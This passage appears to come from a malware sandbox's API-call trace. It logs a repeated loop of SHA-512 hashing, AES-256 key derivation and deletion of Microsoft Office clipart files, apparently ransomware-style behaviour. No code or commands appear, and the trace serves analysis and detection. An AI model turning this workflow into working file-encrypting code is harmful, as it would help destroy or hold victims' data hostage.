(hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.837] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad4b8) returned 1 [0178.837] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.837] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.837] wcslen (_String="\\\\?\\") returned 0x4 [0178.954] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 1 [0178.955] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0178.956] CryptDestroyKey (hKey=0x9ad438) returned 1 [0178.956] wcslen (_String="OK") returned 0x2 [0178.956] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.956] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.956] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0178.956] CryptDestroyHash (hHash=0x9ad838) returned 1 [0178.956] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0178.958] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0178.958] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.958] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad1f8) returned 1 [0178.958] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.958] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.958] wcslen (_String="\\\\?\\") returned 0x4 [0179.005] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 1 [0179.006] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0179.007] CryptDestroyKey (hKey=0x9ad738) returned 1 [0179.007] wcslen (_String="OK") returned 0x2 [0179.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.007] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0179.007] CryptDestroyHash (hHash=0x9ad138) returned 1 [0179.007] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0179.009] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0179.009] CryptHashData (hHash=0x9ad638, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.009] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad638, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad2b8) returned 1 [0179.009] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.009] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.009] wcslen (_String="\\\\?\\") returned 0x4 [0179.118] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 1 [0179.119] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0179.120] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0179.120] wcslen (_String="OK") returned 0x2 [0179.120] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.120] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.120] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0179.120] CryptDestroyHash (hHash=0x9ad638) returned 1 [0179.120] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0179.121] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0179.121] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.121] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad138) returned 1 [0179.121] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.121] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.121] wcslen (_String="\\\\?\\") returned 0x4 [0179.164] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 1 [0179.164] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0179.165] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0179.165] wcslen (_String="OK") returned 0x2 [0179.165] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.165] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.165] CryptDestroyKey (hKey=0x9ad138) returned 1 [0179.165] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0179.165] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0179.168] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0179.168] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.168] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad1f8) returned 1 [0179.168] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.168] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.168] wcslen (_String="\\\\?\\") returned 0x4 [0179.286] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 1 [0179.286] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0179.287] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0179.287] wcslen (_String="OK") returned 0x2 [0179.287] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.287] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.287] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0179.287] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0179.287] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0179.288] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0179.288] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.288] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad538) returned 1 [0179.288] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.288] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.288] wcslen (_String="\\\\?\\") returned 0x4 [0179.318] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 1 [0179.318] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0179.319] CryptDestroyKey (hKey=0x9ad738) returned 1 [0179.319] wcslen (_String="OK") returned 0x2 [0179.319] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.319] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.319] CryptDestroyKey (hKey=0x9ad538) returned 1 [0179.319] CryptDestroyHash (hHash=0x9ad178) returned 1 [0179.319] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0179.322] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0179.322] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.322] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad478) returned 1 [0179.322] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.322] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.322] wcslen (_String="\\\\?\\") returned 0x4 [0179.342] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 1 [0179.342] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0179.343] CryptDestroyKey (hKey=0x9ad638) returned 1 [0179.343] wcslen (_String="OK") returned 0x2 [0179.343] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.343] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.343] CryptDestroyKey (hKey=0x9ad478) returned 1 [0179.343] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0179.344] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0179.346] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0179.346] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.346] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad738) returned 1 [0179.346] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.346] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.346] wcslen (_String="\\\\?\\") returned 0x4 [0179.436] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 1 [0179.436] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0179.437] CryptDestroyKey (hKey=0x9ad438) returned 1 [0179.438] wcslen (_String="OK") returned 0x2 [0179.438] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.438] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.438] CryptDestroyKey (hKey=0x9ad738) returned 1 [0179.438] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0179.438] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0179.440] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0179.440] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.440] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad578) returned 1 [0179.440] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.440] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.440] wcslen (_String="\\\\?\\") returned 0x4 [0179.510] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 1 [0179.510] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0179.511] CryptDestroyKey (hKey=0x9ad138) returned 1 [0179.511] wcslen (_String="OK") returned 0x2 [0179.511] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.511] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.511] CryptDestroyKey (hKey=0x9ad578) returned 1 [0179.511] CryptDestroyHash (hHash=0x9ad178) returned 1 [0179.511] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0179.514] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0179.514] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.514] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad2f8) returned 1 [0179.514] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.514] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.514] wcslen (_String="\\\\?\\") returned 0x4 [0179.560] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 1 [0179.561] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0179.562] CryptDestroyKey (hKey=0x9ad878) returned 1 [0179.562] wcslen (_String="OK") returned 0x2 [0179.562] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.562] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.562] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0179.562] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0179.562] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0179.564] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0179.564] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.564] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad678) returned 1 [0179.564] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.565] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.565] wcslen (_String="\\\\?\\") returned 0x4 [0179.571] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 1 [0179.572] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0179.573] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0179.573] wcslen (_String="OK") returned 0x2 [0179.573] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.573] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.573] CryptDestroyKey (hKey=0x9ad678) returned 1 [0179.573] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0179.573] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0179.576] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0179.576] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.576] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad478) returned 1 [0179.576] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.576] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.576] wcslen (_String="\\\\?\\") returned 0x4 [0179.599] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 1 [0179.599] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0179.600] CryptDestroyKey (hKey=0x9ad178) returned 1 [0179.600] wcslen (_String="OK") returned 0x2 [0179.600] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.600] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.600] CryptDestroyKey (hKey=0x9ad478) returned 1 [0179.600] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0179.600] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0179.603] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0179.603] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.603] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad538) returned 1 [0179.603] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.603] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.603] wcslen (_String="\\\\?\\") returned 0x4 [0179.615] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 1 [0179.615] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0179.616] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0179.616] wcslen (_String="OK") returned 0x2 [0179.616] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.616] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.616] CryptDestroyKey (hKey=0x9ad538) returned 1 [0179.616] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0179.616] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0179.619] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0179.619] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.619] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad138) returned 1 [0179.619] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.619] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.619] wcslen (_String="\\\\?\\") returned 0x4 [0179.628] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 1 [0179.628] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0179.629] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0179.629] wcslen (_String="OK") returned 0x2 [0179.629] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.630] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.630] CryptDestroyKey (hKey=0x9ad138) returned 1 [0179.630] CryptDestroyHash (hHash=0x9ad738) returned 1 [0179.630] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0179.632] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0179.632] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.632] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad4b8) returned 1 [0179.632] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.632] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.632] wcslen (_String="\\\\?\\") returned 0x4 [0179.637] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 1 [0179.637] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0179.638] CryptDestroyKey (hKey=0x9ad338) returned 1 [0179.638] wcslen (_String="OK") returned 0x2 [0179.638] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.638] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.638] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0179.638] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0179.638] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0179.640] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0179.640] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.640] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad1b8) returned 1 [0179.640] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.640] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.640] wcslen (_String="\\\\?\\") returned 0x4 [0179.680] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 1 [0179.680] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0179.682] CryptDestroyKey (hKey=0x9ad678) returned 1 [0179.682] wcslen (_String="OK") returned 0x2 [0179.682] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.682] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.682] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0179.682] CryptDestroyHash (hHash=0x9ad578) returned 1 [0179.682] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0179.685] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0179.685] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.685] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad638) returned 1 [0179.685] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.685] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.685] wcslen (_String="\\\\?\\") returned 0x4 [0179.740] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 1 [0179.740] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0179.741] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0179.741] wcslen (_String="OK") returned 0x2 [0179.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.741] CryptDestroyKey (hKey=0x9ad638) returned 1 [0179.741] CryptDestroyHash (hHash=0x9ad178) returned 1 [0179.741] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0179.743] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0179.743] CryptHashData (hHash=0x9ad778, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.743] CryptDeriveKey (in: hProv=0x8e3b28, 